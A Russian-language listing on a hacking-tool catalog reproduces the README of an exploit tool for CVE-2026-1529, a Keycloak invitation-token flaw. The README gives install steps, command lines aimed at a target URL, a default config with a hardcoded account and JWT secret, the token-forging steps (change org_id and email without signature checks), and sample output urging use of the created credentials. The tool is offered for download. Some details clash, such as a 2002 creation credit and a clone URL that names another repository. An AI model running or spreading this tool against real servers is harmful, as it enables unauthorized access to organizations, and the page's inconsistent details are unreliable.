Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation — Эксплойт-инструмент для CVE-2026-1529, демонстрирующий несанкционированную регистрацию организации в Keycloak через манипуляцию JWT-токеном. Включает генерацию токена, манипуляцию им и регистрацию пользователя с формированием отчёта. | Kitploit
Инструменты/GitHubGitHub/ackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияБезопасность API
GitHubackemed/cve-2026-1529-poc-keycloak-unauthorized-registration-via-improper-invitation-token-validation

CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation

Эксплойт-инструмент для CVE-2026-1529, демонстрирующий несанкционированную регистрацию организации в Keycloak через манипуляцию JWT-токеном. Включает генерацию токена, манипуляцию им и регистрацию пользователя с формированием отчёта.

РепозиторийСайт
387 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1529 Keycloak Exploit Tool

Keycloak: Несанкционированная регистрация в организации через некорректную проверку пригласительных токенов


Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и тестирования безопасности. Используйте его только на системах, на тестирование которых у вас есть явное разрешение. Несанкционированный доступ к компьютерным системам незаконен и неэтичен. Авторы этого инструмента не несут ответственности за любое неправомерное использование или ущерб, причинённый этим программным обеспечением.

Создано: f3ds cr3w est, 2002


Обзор

CVE-2026-1529 — критическая уязвимость в Keycloak, которая позволяет несанкционированную регистрацию в организации через некорректную проверку пригласительных токенов. Этот эксплойт-инструмент демонстрирует уязвимость путём манипуляции JWT-токенами для регистрации пользователей в несанкционированных организациях.

Технические детали

  • CVE ID: CVE-2026-1529
  • Затронутое ПО: Keycloak (org.keycloak.services.resources.organizations)
  • Оценка CVSS: 8.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
  • Вектор атаки: Сеть
  • Сложность атаки: Низкая
  • Воздействие: Несанкционированный доступ к ресурсам организации

Описание уязвимости

Уязвимость существует в процессе проверки JWT-токенов для приглашений в организации. Злоумышленники могут манипулировать полями org_id и email в полезной нагрузке JWT, что позволяет им регистрировать пользователей в любой организации без надлежащей авторизации.


Установка

Предварительные требования

  • Python 3.7 или выше
  • Менеджер пакетов pip

Настройка

  1. Клонируйте или скачайте эксплойт-инструмент:
git clone https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation
cd CVE-2026-1529-POC
  1. Установите необходимые зависимости:
pip install -r requirements.txt
  1. Сделайте скрипт эксплойта исполняемым:
chmod +x keycloak-exploit.py

Использование

Базовое использование

# Стандартное использование с целевым URL
python keycloak-exploit.py https://target-keycloak.com

# Показать справку
python keycloak-exploit.py -h

# Показать версию
python keycloak-exploit.py -v

Расширенное использование

# Использовать пользовательский пригласительный токен
python keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 https://target-keycloak.com

# Использовать пользовательский ID организации
python keycloak-exploit.py -o custom_org_id https://target-keycloak.com

# Использовать пользовательский файл конфигурации
python keycloak-exploit.py -c custom_config.json https://target-keycloak.com

# Включить отладочное логирование
python keycloak-exploit.py -d https://target-keycloak.com

Параметры командной строки

ПараметрОписаниеОбязательный
targetЦелевой URL Keycloak (IP или домен)Да
-t, --tokenПользовательский пригласительный токенНет
-o, --org-idПользовательский ID организацииНет
-c, --configПуть к файлу конфигурацииНет
-d, --debugВключить отладочное логированиеНет
-v, --versionПоказать информацию о версииНет
-h, --helpПоказать справочное сообщениеНет

Вывод

Успешный эксплойт

При успешном эксплойте вы увидите вывод, подобный следующему:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✓ Target is vulnerable to CVE-2026-1529

🎯 EXPLOIT SUCCESSFUL!
Username: admin_user_2026
Password: KeycloakCVE2026!
Email: [email protected]
Login Link: https://target-keycloak.com/realms/master/account

📄 Report saved to: output/reports/exploit_report_20260210_134556.txt

🔐 Use the provided credentials to access the Keycloak instance!
⚠️  This demonstrates unauthorized access due to CVE-2026-1529

=============================================================
by f3ds cr3w est, 2002
=============================================================

Неудачный эксплойт

Если эксплойт не удался, вы увидите:

=============================================================
CVE-2026-1529 EXPLOIT RESULTS
=============================================================
✗ Target is not vulnerable

❌ EXPLOIT FAILED!
Check logs for details: logs/exploit.log

Структура проекта

CVE-2026-1529-POC/
├── keycloak-exploit.py          # Main exploit script
├── requirements.txt             # Python dependencies
├── README.md                   # This file
├── config/
│   └── default_config.json     # Default configuration
├── utils/
│   ├── jwt_utils.py            # JWT manipulation utilities
│   ├── http_utils.py           # HTTP client utilities
│   └── crypto_utils.py         # Cryptographic utilities
├── output/
│   ├── logs/                   # Log files
│   └── reports/                # Exploit reports

Конфигурация

Конфигурация по умолчанию

Инструмент использует файл конфигурации по умолчанию (config/default_config.json) со следующими настройками:

{
  "exploit": {
    "default_username": "admin_user_2026",
    "default_password": "KeycloakCVE2026!",
    "default_email": "[email protected]",
    "timeout": 30,
    "max_retries": 3
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "keycloak-cve-2026-1529-exploit",
    "token_expiry": 3600
  },
  "target": {
    "endpoints": {
      "realms": "/realms",
      "organizations": "/organizations",
      "register": "/register",
      "login": "/login"
    }
  },
  "output": {
    "log_level": "INFO",
    "save_reports": true,
    "report_format": "txt"
  }
}

Пользовательская конфигурация

Вы можете создать собственный файл конфигурации и использовать его с параметром -c:

{
  "exploit": {
    "default_username": "custom_user",
    "default_password": "CustomPassword123!",
    "default_email": "[email protected]",
    "timeout": 60,
    "max_retries": 5
  },
  "jwt": {
    "algorithm": "HS256",
    "secret_key": "custom-secret-key",
    "token_expiry": 7200
  }
}

Технические детали

Процесс эксплойта

  1. Анализ цели: Проверка, является ли цель уязвимым экземпляром Keycloak
  2. Генерация токена: Генерация или использование пользовательского пригласительного токена
  3. Манипуляция токеном: Изменение полезной нагрузки JWT для смены ID организации
  4. Регистрация пользователя: Регистрация пользователя с использованием изменённого токена
  5. Проверка входа: Проверка возможности входа созданного пользователя
  6. Генерация отчёта: Создание подробного отчёта об эксплойте

Манипуляция JWT

Инструмент использует некорректную проверку JWT следующим образом:

  1. Декодирование JWT-токена без проверки подписи
  2. Изменение поля org_id для нацеливания на другую организацию
  3. Изменение поля email при необходимости
  4. Повторное кодирование токена с изменённой полезной нагрузкой

Вопросы безопасности

  • Инструмент использует надлежащую обработку ошибок и логирование
  • Все сетевые запросы включают соответствующие заголовки
  • Проверка входных данных выполняется для всех пользовательских вводов
  • Инструмент учитывает коды ответов сервера цели

Устранение неполадок

Распространённые проблемы

  1. Ошибки подключения

    • Проверьте доступность целевого URL
    • Убедитесь, что цель является экземпляром Keycloak
    • Проверьте сетевое подключение и настройки брандмауэра
  2. Ошибки проверки токена

    • Убедитесь, что формат токена корректен
    • Проверьте, содержит ли токен обязательные поля (org_id, email, invitation_type)
    • Убедитесь, что токен не истёк
Скачать инструмент